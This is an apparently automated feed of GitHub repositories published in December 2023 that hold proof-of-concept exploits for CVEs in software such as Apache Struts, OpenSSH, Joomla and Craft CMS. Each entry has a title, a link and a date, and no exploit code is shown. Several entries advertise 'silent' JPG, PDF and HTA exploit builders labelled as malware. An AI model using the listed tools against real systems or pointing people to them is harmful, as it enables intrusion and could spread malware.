**no description** : [DDayLuong/CVE-2019-18634](https://github.com/DDayLuong/CVE-2019-18634) create time: 2023-12-26T18:13:32Z

**no description** : [DDayLuong/CVE-2021-3156](https://github.com/DDayLuong/CVE-2021-3156) create time: 2023-12-26T18:16:14Z

**Exploit for the CVE 2023-12-26 affecting Craft CMS** : [Faelian/CraftCMS_CVE-2023-12-26](https://github.com/Faelian/CraftCMS_CVE-2023-12-26) create time: 2023-12-26T18:05:23Z

**Postfix SMTP Smuggling - Expect Script POC** : [duy-31/CVE-2023-51764](https://github.com/duy-31/CVE-2023-51764) create time: 2023-12-26T17:02:20Z

**no description** : [MkJos/CVE-2023-33246_RocketMQ_RCE_EXP](https://github.com/MkJos/CVE-2023-33246_RocketMQ_RCE_EXP) create time: 2023-12-26T12:41:30Z

**no description** : [tannlh/CVE-2018-20250](https://github.com/tannlh/CVE-2018-20250) create time: 2023-12-26T11:01:32Z

**no description** : [nidhi7598/frameworks_base_AOSP10_r33_CVE-2023-21266](https://github.com/nidhi7598/frameworks_base_AOSP10_r33_CVE-2023-21266) create time: 2023-12-26T10:02:13Z

**CVE-2023-51385** : [WLaoDuo/CVE-2023-51385_poc-test](https://github.com/WLaoDuo/CVE-2023-51385_poc-test) create time: 2023-12-26T09:01:02Z

**no description** : [B3nj4h/CVE-2021-4045](https://github.com/B3nj4h/CVE-2021-4045) create time: 2023-12-26T08:20:49Z

**no description** : [kimstars/POC-CVE-2022-28117](https://github.com/kimstars/POC-CVE-2022-28117) create time: 2023-12-26T06:51:54Z

**Exploit Development using python for CVE-2023-38831 (POC)** : [r1yaz/winDED](https://github.com/r1yaz/winDED) create time: 2023-12-26T01:36:32Z

**一个验证对CVE-2023-51385** : [zls1793/CVE-2023-51385_test](https://github.com/zls1793/CVE-2023-51385_test) create time: 2023-12-25T13:13:25Z

**OpenSSH ProxyCommand RCE** : [Le1a/CVE-2023-51385](https://github.com/Le1a/CVE-2023-51385) create time: 2023-12-25T12:51:05Z

**MailCarrier 2.51 - POP3 'USER' Buffer Overflow** : [redalien301090/CVE-2019-11395](https://github.com/redalien301090/CVE-2019-11395) create time: 2023-12-25T11:30:37Z

**OpenSSH ProxyCommand RCE** : [Le1a/CVE-2023-51385](https://github.com/Le1a/CVE-2023-51385) create time: 2023-12-25T10:12:23Z

**Explore the depths of CVE-2023-6710 with our comprehensive Proof of Concept (PoC). This CVE, identified as a potential security vulnerability, has been meticulously examined to demonstrate its impact and provide a hands-on understanding of the associated risks.** : [DedSec-47/CVE-2023-6710](https://github.com/DedSec-47/CVE-2023-6710) create time: 2023-12-25T09:50:23Z

**no description** : [dust-life/CVE-2019-18935-memShell](https://github.com/dust-life/CVE-2019-18935-memShell) create time: 2023-12-25T06:45:11Z

**This is a test** : [Tachanka-zz/CVE-2023-51385_test](https://github.com/Tachanka-zz/CVE-2023-51385_test) create time: 2023-12-25T07:43:57Z

**no description** : [watarium/poc-cve-2023-51385](https://github.com/watarium/poc-cve-2023-51385) create time: 2023-12-25T07:43:29Z

**no description** : [FeatherStark/CVE-2023-51385](https://github.com/FeatherStark/CVE-2023-51385) create time: 2023-12-25T04:34:02Z

**CVE-2023-40362 Vulnerabilitiy details and proof of concept** : [ally-petitt/CVE-2023-40362](https://github.com/ally-petitt/CVE-2023-40362) create time: 2023-08-26T01:35:43Z

**CVE-2021-40444** : [MohamedAboHelal/CVE-2021-40444](https://github.com/MohamedAboHelal/CVE-2021-40444) create time: 2023-12-24T16:20:39Z

**no description** : [zunak/CVE-2023-49471](https://github.com/zunak/CVE-2023-49471) create time: 2023-12-24T15:40:24Z

**A Proof of Concept exploit for the PyInstaller CVE-2019-16783** : [Ckrielle/CVE-2019-16784-POC](https://github.com/Ckrielle/CVE-2019-16784-POC) create time: 2023-12-24T14:53:28Z

**ZoneMinder Snapshots - Unauthenticated** : [Yuma-Tsushima07/CVE-2023-26035](https://github.com/Yuma-Tsushima07/CVE-2023-26035) create time: 2023-12-24T13:37:39Z

**Exploit for CVE-2022-36779 authenticated Command Injection** : [rootDR/CVE-2022-36779](https://github.com/rootDR/CVE-2022-36779) create time: 2023-12-24T10:46:50Z

**Test fo how CVE-2023-51385 works** : [dlewen/CVE-2023-51385-test](https://github.com/dlewen/CVE-2023-51385-test) create time: 2023-12-24T09:03:39Z

**no description** : [sickthecat/CVE-2019-1388](https://github.com/sickthecat/CVE-2019-1388) create time: 2023-12-24T01:31:28Z

**no description** : [K3ysTr0K3R/CVE-2019-17382-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2019-17382-EXPLOIT) create time: 2023-12-23T14:02:13Z

**no description** : [puckiestyle/CVE-2023-4911](https://github.com/puckiestyle/CVE-2023-4911) create time: 2023-12-23T11:54:40Z

**no description** : [cli-ish/CVE-2023-6663](https://github.com/cli-ish/CVE-2023-6663) create time: 2023-12-23T11:39:57Z

**no description** : [cli-ish/CVE-2023-6661](https://github.com/cli-ish/CVE-2023-6661) create time: 2023-12-23T11:39:50Z

**no description** : [puckiestyle/CVE-2023-0386](https://github.com/puckiestyle/CVE-2023-0386) create time: 2023-12-23T11:01:55Z

**CVE-2023-46604 - ApacheMQ Version 5.15.5 Vulnerability Machine: Broker** : [Mudoleto/Broker_ApacheMQ](https://github.com/Mudoleto/Broker_ApacheMQ) create time: 2023-12-23T08:41:01Z

**no description** : [Makurorororororororo/Validate-CVE-2023-29489-scanner-](https://github.com/Makurorororororororo/Validate-CVE-2023-29489-scanner-) create time: 2023-12-23T06:28:32Z

**CVE-2023-49438 - Open Redirect Vulnerability in Flask-Security-Too** : [brandon-t-elliott/CVE-2023-49438](https://github.com/brandon-t-elliott/CVE-2023-49438) create time: 2023-12-14T23:58:42Z

**Multiple cross-site scripting (XSS) vulnerabilities in /customer_support/ajax.php?action=save_customer in Customer Support System 1.0 allow authenticated attackers to execute to execute arbitrary web scripts or HTML via a crafted payload injected into the “firstname”, "lastname", "middlename", "contact" or “address” parameters.** : [geraldoalcantara/CVE-2023-51281](https://github.com/geraldoalcantara/CVE-2023-51281) create time: 2023-12-22T15:51:43Z

**A demo exploit for CVE-2021-44026, a SQL injection in Roundcube** : [pentesttoolscom/roundcube-cve-2021-44026](https://github.com/pentesttoolscom/roundcube-cve-2021-44026) create time: 2023-11-14T11:32:36Z

**no description** : [Guillaume-Risch/cve-2023-29357-Sharepoint](https://github.com/Guillaume-Risch/cve-2023-29357-Sharepoint) create time: 2023-12-22T08:42:00Z

**CVE-2023-50254: PoC Exploit for Deepin-reader RCE that affects unpatched Deepin Linux Desktops. Deepin Linux's default document reader "deepin-reader" software suffers from a serious vulnerability due to a design flaw that leads to Remote Command Execution via crafted docx document.** : [febinrev/deepin-linux_reader_RCE-exploit](https://github.com/febinrev/deepin-linux_reader_RCE-exploit) create time: 2023-12-22T06:50:28Z

**no description** : [aaronm-sysdig/cve-2023-50164](https://github.com/aaronm-sysdig/cve-2023-50164) create time: 2023-12-22T02:20:11Z

**no description** : [miles3719/cve-2023-50164](https://github.com/miles3719/cve-2023-50164) create time: 2023-12-22T02:15:36Z

**no description** : [substing/CVE-2020-24186_reverse_shell_upload](https://github.com/substing/CVE-2020-24186_reverse_shell_upload) create time: 2023-12-21T23:23:43Z

**Directory Traversal and Arbitrary File Read on Grafana** : [wagneralves/CVE-2021-43798](https://github.com/wagneralves/CVE-2021-43798) create time: 2023-12-21T14:24:53Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [Mxcoders2s/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Mxcoders2s/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-21T12:55:34Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [Mxcoders2s/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Mxcoders2s/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-21T12:55:32Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [Mxcoders2s/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Mxcoders2s/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-21T12:55:32Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [Mxcoders2s/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/Mxcoders2s/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-21T12:55:32Z

**no description** : [Fineas/CVE-2019-13288-POC](https://github.com/Fineas/CVE-2019-13288-POC) create time: 2023-12-21T11:46:41Z

**Apache 2.4.50 - Path Traversal or Remote Code Execution** : [Rubikcuv5/cve-2021-42013](https://github.com/Rubikcuv5/cve-2021-42013) create time: 2023-12-21T11:20:39Z

**no description** : [chandraprarikraj/CVE-2023-50596](https://github.com/chandraprarikraj/CVE-2023-50596) create time: 2023-12-20T21:43:28Z

**no description** : [chandraprarikraj/CVE-2023-51214](https://github.com/chandraprarikraj/CVE-2023-51214) create time: 2023-12-20T21:23:33Z

**Mass Scanner for CVE-2023-23752** : [TindalyTn/CVE-2023-23752](https://github.com/TindalyTn/CVE-2023-23752) create time: 2023-12-20T20:20:15Z

**no description** : [That-Guy-Steve/CVE-2018-1133-Exploit](https://github.com/That-Guy-Steve/CVE-2018-1133-Exploit) create time: 2023-12-20T17:29:54Z

**no description** : [ahrixia/CVE-2023-50072](https://github.com/ahrixia/CVE-2023-50072) create time: 2023-12-20T14:36:01Z

**URL Contamination Exploit Muted Java Drive-By downloads can transpire during the act of perusing a website, inaugurating an electronic mail communication.** : [desquezzee/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/desquezzee/Slient-Url-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-20T11:48:22Z

**Microsoft Windows HTA (HTML Application) - Pinnacle of Remote Code Execution** : [desquezzee/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/desquezzee/Hta-Exploit-Builder-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-20T11:48:22Z

**A meticulous scrutiny of the Exploit PDFs innards exposes a network of malevolence, unveiling both the nefarious hyperlink and the URL that precipitates** : [desquezzee/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/desquezzee/Slient-PDF-FUD-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-20T11:48:22Z

**In the hushed galleries of the Silent JPG Exploit, a symphony shrouded in enigma unfurls—an opus named silent-jpg-exploit-2018—a title that reverberates through the annals of intrigue.** : [desquezzee/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware](https://github.com/desquezzee/Jpg-Png-Exploit-Slient-Builder-Exploit-Database-Cve-2023-Malware) create time: 2023-12-20T11:48:22Z

**Hotel Booking Management v1.0 - SQL Injection Vulnerability in the "id" parameter at update.php** : [geraldoalcantara/CVE-2023-49989](https://github.com/geraldoalcantara/CVE-2023-49989) create time: 2023-12-20T04:46:28Z

**Hotel Booking Management v1.0 - SQL Injection Vulnerability in the "npss" parameter at rooms.php** : [geraldoalcantara/CVE-2023-49988](https://github.com/geraldoalcantara/CVE-2023-49988) create time: 2023-12-20T04:36:35Z

**School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in "tname" parameter on "new_term"** : [geraldoalcantara/CVE-2023-49987](https://github.com/geraldoalcantara/CVE-2023-49987) create time: 2023-12-20T04:30:49Z

**School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in "name" parameter on "add_new_parent"** : [geraldoalcantara/CVE-2023-49986](https://github.com/geraldoalcantara/CVE-2023-49986) create time: 2023-12-20T04:21:46Z

**School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in "cname" parameter on "new_class"** : [geraldoalcantara/CVE-2023-49985](https://github.com/geraldoalcantara/CVE-2023-49985) create time: 2023-12-20T04:12:02Z

**School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in "name" field/parameter on "/management/settings"** : [geraldoalcantara/CVE-2023-49984](https://github.com/geraldoalcantara/CVE-2023-49984) create time: 2023-12-20T04:06:00Z

**School Fees Management System v1.0 - Cross-Site Scripting (XSS) Vulnerability in "name" field/parameter on "/management/class"** : [geraldoalcantara/CVE-2023-49983](https://github.com/geraldoalcantara/CVE-2023-49983) create time: 2023-12-20T03:56:16Z

**School Fees Management System v1.0 - Incorrect Access Control - Privilege Escalation** : [geraldoalcantara/CVE-2023-49982](https://github.com/geraldoalcantara/CVE-2023-49982) create time: 2023-12-20T03:44:16Z

**School Fees Management System v1.0 - Incorrect Access Control - Directory Listing** : [geraldoalcantara/CVE-2023-49981](https://github.com/geraldoalcantara/CVE-2023-49981) create time: 2023-12-20T03:19:09Z

**Best Student Management System v1.0 - Incorrect Access Control - Directory Listing** : [geraldoalcantara/CVE-2023-49979](https://github.com/geraldoalcantara/CVE-2023-49979) create time: 2023-12-20T03:01:53Z

**Customer Support System 1.0 - Incorrect Access Control** : [geraldoalcantara/CVE-2023-49978](https://github.com/geraldoalcantara/CVE-2023-49978) create time: 2023-12-20T01:51:28Z

**Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in "Address" field/parameter on "customer_list" Page** : [geraldoalcantara/CVE-2023-49977](https://github.com/geraldoalcantara/CVE-2023-49977) create time: 2023-12-20T01:43:06Z

**Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in "contact" field/parameter on "customer_list" Page** : [geraldoalcantara/CVE-2023-49974](https://github.com/geraldoalcantara/CVE-2023-49974) create time: 2023-12-20T01:31:08Z

**Customer Support System 1.0 - Cross-Site Scripting (XSS) Vulnerability in "email" field/parameter on "customer_list" Page** : [geraldoalcantara/CVE-2023-49973](https://github.com/geraldoalcantara/CVE-2023-49973) create time: 2023-12-20T01:26:22Z

**Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the "firstname" parameter at "customer_list** : [geraldoalcantara/CVE-2023-49971](https://github.com/geraldoalcantara/CVE-2023-49971) create time: 2023-12-20T00:55:22Z

**Customer Support System 1.0 - SQL Injection Vulnerability in the "subject" Parameter During "save_ticket" Operation** : [geraldoalcantara/CVE-2023-49970](https://github.com/geraldoalcantara/CVE-2023-49970) create time: 2023-12-19T23:12:29Z

**Customer Support System 1.0 - SQL Injection Vulnerability in edit_customer via "id" URL Parameter** : [geraldoalcantara/CVE-2023-49969](https://github.com/geraldoalcantara/CVE-2023-49969) create time: 2023-12-19T23:02:09Z

**Customer Support System 1.0 - SQL Injection Vulnerability in manage_department.php via "id" URL Parameter** : [geraldoalcantara/CVE-2023-49968](https://github.com/geraldoalcantara/CVE-2023-49968) create time: 2023-12-19T22:45:22Z

**Customer Support System 1.0 - SQL Injection Vulnerability in the "lastname" Parameter During "save_user" Operation** : [geraldoalcantara/CVE-2023-49548](https://github.com/geraldoalcantara/CVE-2023-49548) create time: 2023-12-19T22:27:24Z

**Customer Support System 1.0 - SQL Injection Vulnerability in the "email" Parameter During "save_staff" Operation** : [geraldoalcantara/CVE-2023-49546](https://github.com/geraldoalcantara/CVE-2023-49546) create time: 2023-12-19T21:54:36Z

**Book Store Management System v1.0 - Cross-site scripting (XSS) vulnerability in /index.php/history - vulnerable field: "Customer's Name".** : [geraldoalcantara/CVE-2023-49540](https://github.com/geraldoalcantara/CVE-2023-49540) create time: 2023-12-19T20:50:09Z

**Book Store Management System v1.0 - Cross-site scripting (XSS) vulnerability in "index.php/category" - vulnerable field: "Category Name"** : [geraldoalcantara/CVE-2023-49539](https://github.com/geraldoalcantara/CVE-2023-49539) create time: 2023-12-19T20:31:36Z

**Vulnerable docker container for Apache Struts 2 RCE CVE-2023-50164** : [Trackflaw/CVE-2023-50164-ApacheStruts2-Docker](https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker) create time: 2023-12-20T08:46:19Z

**no description** : [Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE](https://github.com/Thirukrishnan/CVE-2023-50164-Apache-Struts-RCE) create time: 2023-12-20T08:39:54Z

**this is a script that exploits the CVE-2023-27163 vulnerability which is request-basket SSRF** : [KharimMchatta/basketcraft](https://github.com/KharimMchatta/basketcraft) create time: 2023-12-20T06:29:18Z

**no description** : [Cristiano100/CVE-2023-47119](https://github.com/Cristiano100/CVE-2023-47119) create time: 2023-12-20T04:43:15Z

**Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)** : [Sic4rio/CVE-2009-3103---srv2.sys-SMB-Code-Execution-Python-MS09-050-](https://github.com/Sic4rio/CVE-2009-3103---srv2.sys-SMB-Code-Execution-Python-MS09-050-) create time: 2023-12-20T02:36:58Z

**Binaries for "CVE-2023-23752"** : [gunzf0x/CVE-2023-23752](https://github.com/gunzf0x/CVE-2023-23752) create time: 2023-12-19T20:18:49Z

**no description** : [DARKSECshell/CVE-2023-1337](https://github.com/DARKSECshell/CVE-2023-1337) create time: 2023-12-19T13:01:43Z

**no description** : [R41N3RZUF477/CVE-2023-41772](https://github.com/R41N3RZUF477/CVE-2023-41772) create time: 2023-12-19T11:21:12Z

**no description** : [zhangkaibin0921/CVE-2012-2122](https://github.com/zhangkaibin0921/CVE-2012-2122) create time: 2023-12-01T09:16:20Z

**no description** : [zhangkaibin0921/MS12-020-CVE-2012-0002](https://github.com/zhangkaibin0921/MS12-020-CVE-2012-0002) create time: 2023-11-30T07:58:49Z

**OwnCloud CVE-2023-49103** : [merlin-ke/OwnCloud-CVE-2023-49103](https://github.com/merlin-ke/OwnCloud-CVE-2023-49103) create time: 2023-12-19T07:56:18Z

**CVE-2017-7529: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.** : [coolman6942o/-Exploit-CVE-2017-7529](https://github.com/coolman6942o/-Exploit-CVE-2017-7529) create time: 2023-12-19T04:21:18Z

**This tool calculates tricky canonical huffman histogram for CVE-2023-4863.** : [caoweiquan322/NotEnough](https://github.com/caoweiquan322/NotEnough) create time: 2023-12-19T01:32:45Z

**An implementation of a proof-of-concept for CVE-2018-5767** : [Scorpion-Security-Labs/CVE-2018-5767-AC9](https://github.com/Scorpion-Security-Labs/CVE-2018-5767-AC9) create time: 2023-12-18T18:17:45Z

**An implementation of a proof-of-concept for CVE-2020-12124** : [Scorpion-Security-Labs/CVE-2020-12124](https://github.com/Scorpion-Security-Labs/CVE-2020-12124) create time: 2023-12-18T18:09:55Z

**Repository that contains a CVE-2020-11651 Exploit updated to work with the latest versions of python.** : [hardsoftsecurity/CVE-2020-11651-PoC](https://github.com/hardsoftsecurity/CVE-2020-11651-PoC) create time: 2023-12-18T13:56:42Z

**no description** : [helsecert/cve-2023-50164](https://github.com/helsecert/cve-2023-50164) create time: 2023-12-18T08:24:26Z

**no description** : [SangPenyalang/CVE2023-29484](https://github.com/SangPenyalang/CVE2023-29484) create time: 2023-12-18T12:03:09Z

**no description** : [Arszilla/CVE-2023-6538](https://github.com/Arszilla/CVE-2023-6538) create time: 2023-12-18T09:29:42Z

**no description** : [Arszilla/CVE-2023-5808](https://github.com/Arszilla/CVE-2023-5808) create time: 2023-12-18T09:24:14Z

**An access control flaw was identified, potentially leading to unauthorized access to critical webservice endpoints within Joomla! CMS versions 4.0.0 through 4.2.7. This vulnerability could be exploited by attackers to gain unauthorized access to sensitive information or perform unauthorized actions.** : [JeneralMotors/CVE-2023-23752](https://github.com/JeneralMotors/CVE-2023-23752) create time: 2023-12-18T00:47:27Z

**MajorDoMo Unauthenticated RCE: Deep Dive & Exploitation Techniques** : [Chocapikk/CVE-2023-50917](https://github.com/Chocapikk/CVE-2023-50917) create time: 2023-10-29T05:10:09Z

**Pre-auth RCE in Apache Ofbiz!!** : [0xrobiul/CVE-2023-49070](https://github.com/0xrobiul/CVE-2023-49070) create time: 2023-12-17T22:56:10Z

**CVE-2022-29063: Java Deserialization via RMI Connection in Apache OfBiz** : [mbadanoiu/CVE-2022-29063](https://github.com/mbadanoiu/CVE-2022-29063) create time: 2023-12-17T21:11:30Z

**CVE-2022-25813: FreeMarker Server-Side Template Injection in Apache OfBiz** : [mbadanoiu/CVE-2022-25813](https://github.com/mbadanoiu/CVE-2022-25813) create time: 2023-12-17T20:43:26Z

**Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164")** : [dwisiswant0/cve-2023-50164-poc](https://github.com/dwisiswant0/cve-2023-50164-poc) create time: 2023-12-17T14:18:54Z

**no description** : [0xget/cve-2001-1473](https://github.com/0xget/cve-2001-1473) create time: 2023-12-17T14:11:13Z

**LFI in the Essential Addons for Elementor WordPress plugin** : [0x9567b/CVE-2022-0320](https://github.com/0x9567b/CVE-2022-0320) create time: 2023-12-17T08:38:49Z

**Multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_department in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via id or name.** : [geraldoalcantara/CVE-2023-50071](https://github.com/geraldoalcantara/CVE-2023-50071) create time: 2023-12-16T23:06:25Z

**Simulates CVE-2023-4966 Citrix Bleed overread bug** : [morganwdavis/overread](https://github.com/morganwdavis/overread) create time: 2023-12-16T21:55:04Z

**no description** : [dcm2406/CVE-2021-44228](https://github.com/dcm2406/CVE-2021-44228) create time: 2023-12-16T13:50:35Z

**no description** : [dcm2406/CVE-2023-46604](https://github.com/dcm2406/CVE-2023-46604) create time: 2023-12-16T13:50:58Z

**no description** : [sajaljat/CVE-2023-50132](https://github.com/sajaljat/CVE-2023-50132) create time: 2023-12-16T08:14:14Z

**XSS** : [sajaljat/CVE-2023-50131](https://github.com/sajaljat/CVE-2023-50131) create time: 2023-12-16T08:08:11Z

**A scanning utility and PoC for CVE-2023-50164** : [bcdannyboy/CVE-2023-50164](https://github.com/bcdannyboy/CVE-2023-50164) create time: 2023-12-15T21:19:51Z

**Multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via department_id, customer_id and subject.** : [geraldoalcantara/CVE-2023-50070](https://github.com/geraldoalcantara/CVE-2023-50070) create time: 2023-12-15T20:37:39Z

**CVE-2023-50643** : [V3x0r/CVE-2023-50643](https://github.com/V3x0r/CVE-2023-50643) create time: 2023-12-08T16:37:16Z

**CVE-2023-25690 - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 to 2.4.55 leads to HTTP Request Smuggling.** : [sergiovks/CVE-2023-25690-exploit](https://github.com/sergiovks/CVE-2023-25690-exploit) create time: 2023-12-15T17:57:00Z

**no description** : [K3ysTr0K3R/CVE-2023-32315-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT) create time: 2023-12-15T16:30:51Z

**IBM i Access Client Solution < 1.1.9.4 - Local server broken access control.** : [afine-com/CVE-2023-45184](https://github.com/afine-com/CVE-2023-45184) create time: 2023-12-15T14:04:32Z

**no description** : [ZhiQiAnSecFork/cve-2017-16995](https://github.com/ZhiQiAnSecFork/cve-2017-16995) create time: 2023-12-15T12:30:57Z

**no description** : [nightowl642/Apache_OFBiz-CVE-2023-49070-exploit](https://github.com/nightowl642/Apache_OFBiz-CVE-2023-49070-exploit) create time: 2023-12-15T08:48:09Z

**no description** : [hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2023-4206_CVE-2023-4207_CVE-2023-4208) create time: 2023-12-15T05:13:24Z

**no description** : [markyu0401/CVE-2021-3560-Polkit-Privilege-Escalation](https://github.com/markyu0401/CVE-2021-3560-Polkit-Privilege-Escalation) create time: 2023-12-15T03:38:41Z

**Remote Code Execution exploit for PrimeFaces 5.x - EL Injection (CVE-2017-1000486)** : [LongWayHomie/CVE-2017-1000486](https://github.com/LongWayHomie/CVE-2017-1000486) create time: 2023-12-15T00:04:21Z

**SQL Injection in 3CX CRM Integration** : [CVE-2023-49954/CVE-2023-49954.github.io](https://github.com/CVE-2023-49954/CVE-2023-49954.github.io) create time: 2023-12-14T18:38:28Z

**Atlassian Companion RCE Vulnerability Proof of Concept** : [ron-imperva/CVE-2023-22524](https://github.com/ron-imperva/CVE-2023-22524) create time: 2023-12-14T15:33:11Z

**no description** : [ThiiagoEscobar/CVE-2018-25031](https://github.com/ThiiagoEscobar/CVE-2018-25031) create time: 2023-12-14T11:38:11Z

**no description** : [abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC](https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC) create time: 2023-12-14T09:32:41Z

**no description** : [imperva/CVE-2023-22524](https://github.com/imperva/CVE-2023-22524) create time: 2023-12-14T09:12:11Z

**CVE-2022-4047 poc** : [entroychang/CVE-2022-4047](https://github.com/entroychang/CVE-2022-4047) create time: 2023-12-14T07:36:01Z

**CVE-2023-6771** : [Glunko/Simple-Student-Attendance-System_vulnerability](https://github.com/Glunko/Simple-Student-Attendance-System_vulnerability) create time: 2023-07-17T07:38:11Z

**CVE-2023-49038** : [christopher-pace/CVE-2023-49038](https://github.com/christopher-pace/CVE-2023-49038) create time: 2023-12-14T01:49:52Z

**Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029** : [thehunt1s0n/Exihibitor-RCE](https://github.com/thehunt1s0n/Exihibitor-RCE) create time: 2023-12-14T01:05:45Z

**CVE-2023-20198 / 0day - Cisco - Authentication Bypass/RCE** : [codeb0ss/CVE-2023-20198-PoC](https://github.com/codeb0ss/CVE-2023-20198-PoC) create time: 2023-12-13T22:45:25Z

**no description** : [MY7H404/CVE-2014-6271-Shellshock](https://github.com/MY7H404/CVE-2014-6271-Shellshock) create time: 2023-12-13T20:43:33Z

**Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution** : [Chocapikk/CVE-2023-6553](https://github.com/Chocapikk/CVE-2023-6553) create time: 2023-12-13T20:26:59Z

**no description** : [SpiralBL0CK/cve2019-0539](https://github.com/SpiralBL0CK/cve2019-0539) create time: 2023-12-13T20:17:28Z

**CVE-2023-38831 Proof-of-concept code** : [SpamixOfficial/CVE-2023-38831](https://github.com/SpamixOfficial/CVE-2023-38831) create time: 2023-12-12T14:54:30Z

**no description** : [mareks1007/cve-2017-16995](https://github.com/mareks1007/cve-2017-16995) create time: 2023-12-13T18:49:54Z

**PoC of CVE-2018-25031** : [hev0x/CVE-2018-25031-PoC](https://github.com/hev0x/CVE-2018-25031-PoC) create time: 2023-12-13T18:42:20Z

**Unauthenticated Remote Code Execution with default Imagick** : [ThatNotEasy/CVE-2023-4636](https://github.com/ThatNotEasy/CVE-2023-4636) create time: 2023-12-13T17:59:02Z

**WordPress does not properly restrict which user fields are searchable via the REST API, allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack** : [pog007/CVE-2023-5561-PoC](https://github.com/pog007/CVE-2023-5561-PoC) create time: 2023-12-13T16:43:18Z

**POC script for CVE-2023-26035 (zoneminder 1.36.32)** : [heapbytes/CVE-2023-26035](https://github.com/heapbytes/CVE-2023-26035) create time: 2023-12-13T15:40:24Z

**A critical security vulnerability, identified as CVE-2023-50164 (CVE: 9.8) was found in Apache Struts, allowing attackers to manipulate file upload parameters that can potentially lead to unauthorized path traversal and remote code execution (RCE).** : [jakabakos/CVE-2023-50164-Apache-Struts-RCE](https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE) create time: 2023-12-13T09:31:36Z

**no description** : [hshivhare67/Kernel_4.1.15_CVE-2020-25668](https://github.com/hshivhare67/Kernel_4.1.15_CVE-2020-25668) create time: 2023-12-13T09:14:29Z

**CVE-2023-23752 Joomla Unauthenticated Information Disclosure** : [C1ph3rX13/CVE-2023-23752](https://github.com/C1ph3rX13/CVE-2023-23752) create time: 2023-12-13T03:13:54Z

**Git Submodule RCE** : [zerbaliy3v/CVE-2018-11235-Git-Submodule-RCE](https://github.com/zerbaliy3v/CVE-2018-11235-Git-Submodule-RCE) create time: 2023-12-12T19:41:03Z

**RCE for Webmin CVE-2019-15107** : [0x4r2/Webmin-CVE-2019-15107](https://github.com/0x4r2/Webmin-CVE-2019-15107) create time: 2023-12-12T19:53:50Z

**CVE-2018-6574 this vulnerability impacts Golang go get command and allows an attacker to gain code execution on a system by installing a malicious library, this vulnerability was fixed in Go 1.8. 7, 1.9. 4 and 1.10rc2. Golang will build native extensions.** : [zerbaliy3v/cve-2018-6574-exploit](https://github.com/zerbaliy3v/cve-2018-6574-exploit) create time: 2023-12-12T18:51:24Z

**A proof of concept using python for the CVE-2023-38146 "ThemeBleed"** : [Durge5/ThemeBleedPy](https://github.com/Durge5/ThemeBleedPy) create time: 2023-12-12T19:11:10Z

**PoC for CVE-2023-23333** : [WhiteOwl-Pub/SolarView-PoC-CVE-2023-23333](https://github.com/WhiteOwl-Pub/SolarView-PoC-CVE-2023-23333) create time: 2023-12-12T16:18:01Z

**proof of Concept and Vulnerability Detector for CVE-2023-36845** : [WhiteOwl-Pub/Juniper-PoC-CVE-2023-36845](https://github.com/WhiteOwl-Pub/Juniper-PoC-CVE-2023-36845) create time: 2023-12-12T16:06:46Z

